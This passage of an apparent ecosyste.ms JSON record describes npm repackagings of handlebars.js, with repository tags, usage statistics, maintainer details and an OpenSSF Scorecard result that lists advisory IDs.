arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.5beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0.beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@0.9.0.pre.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2026-07-19T22:22:28.287Z","dependent_packages_count":0,"downloads":14,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.49458668059361,"dependent_packages_count":54.792449353487484,"stargazers_count":0.7541922559264461,"forks_count":0.8723778040086236,"docker_downloads_count":null,"average":23.478401523504044},"purl":"pkg:npm/%40mkilp/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mkilp/handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mkilp/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mkilp/handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-07-10T08:00:54.096Z","issues_count":161,"pull_requests_count":133,"avg_time_to_close_issue":20524950.96153846,"avg_time_to_close_pull_request":16796463.59090909,"issues_closed_count":104,"pull_requests_closed_count":88,"pull_request_authors_count":53,"issue_authors_count":142,"avg_comments_per_issue":3.111801242236025,"avg_comments_per_pull_request":1.699248120300752,"merged_pull_requests_count":57,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":19,"past_year_pull_requests_count":32,"past_year_avg_time_to_close_issue":1112205.857142857,"past_year_avg_time_to_close_pull_request":822488.2222222222,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":18,"past_year_pull_request_authors_count":16,"past_year_issue_authors_count":17,"past_year_avg_comments_per_issue":1.263157894736842,"past_year_avg_comments_per_pull_request":1.40625,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":15,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mkilp%2Fhandlebars/codemeta","maintainers":[{"uuid":"mkilp","login":"mkilp","name":null,"email":"marvin.kilp@yahoo.com","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~mkilp","role":null,"created_at":"2023-08-10T18:16:43.882Z","updated_at":"2023-08-10T18:16:43.882Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/mkilp/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":14015582,"name":"@depup/handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration (with updated dependencies)","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","depup","updated-dependencies","security","latest","patched","mustache","template","html"],"namespace":"depup","versions_count":2,"first_release_published_at":"2026-03-09T05:15:35.958Z","latest_release_published_at":"2026-03-27T00:41:42.138Z","latest_release_number":"4.7.9-depup.0","last_synced_at":"2026-07-19T22:22:29.287Z","created_at":"2026-03-09T05:20:14.397Z","updated_at":"2026-07-19T22:22:29.288Z","registry_url":"https://www.npmjs.com/package/@depup/handlebars","install_command":"npm install @depup/handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.7.9-depup.0"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2026-06-24T23:40:45.000Z","size":4613,"stargazers_count":18652,"open_issues_count":110,"forks_count":2065,"subscribers_count":432,"default_branch":"master","last_synced_at":"2026-07-18T08:04:33.114Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2026-07-17T19:48:10.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"57b49b24-4bc7-4df8-b069-e31179883809","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35619777,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"tags":[{"name":"v4.7.9","sha":"dce542c9a660048d31f0981ac8a45c08b919bddb","kind":"tag","published_at":"2026-03-26T20:44:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.9/manifests"},{"name":"v4.7.8","sha":"8dc3d2517b41d12b1e06f88a449f30d27c137c21","kind":"tag","published_at":"2023-08-01T21:10:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.8/manifests"},{"name":"v4.7.7","sha":"a9a8e403213583ca90cb7c872d3a22796c37d961","kind":"tag","published_at":"2021-02-15T09:36:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.7/manifests"},{"name":"v4.7.6","sha":"e6ad93ea01bcde1f8ddaa4b4ebe572dd616abfaa","kind":"tag","published_at":"2020-04-03T17:56:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.6/manifests"},{"name":"v4.7.5","sha":"1fd2edee2a12fb228061fcde807905c6b14339c4","kind":"tag","published_at":"2020-04-02T19:09:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.5/manifests"},{"name":"v4.7.4","sha":"7adc19ab40917389fc1372d19677f1d024ec42b1","kind":"tag","published_at":"2020-04-01T17:20:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.4/manifests"},{"name":"v3.0.8","sha":"16bd606fec0ada4c811eb7afe6bfd619d88f3d37","kind":"tag","published_at":"2020-02-23T10:02:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.8/manifests"},{"name":"v4.7.3","sha":"c9789691af60b446f12f75dd9762f9d8fd3f36eb","kind":"tag","published_at":"2020-02-05T05:10:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4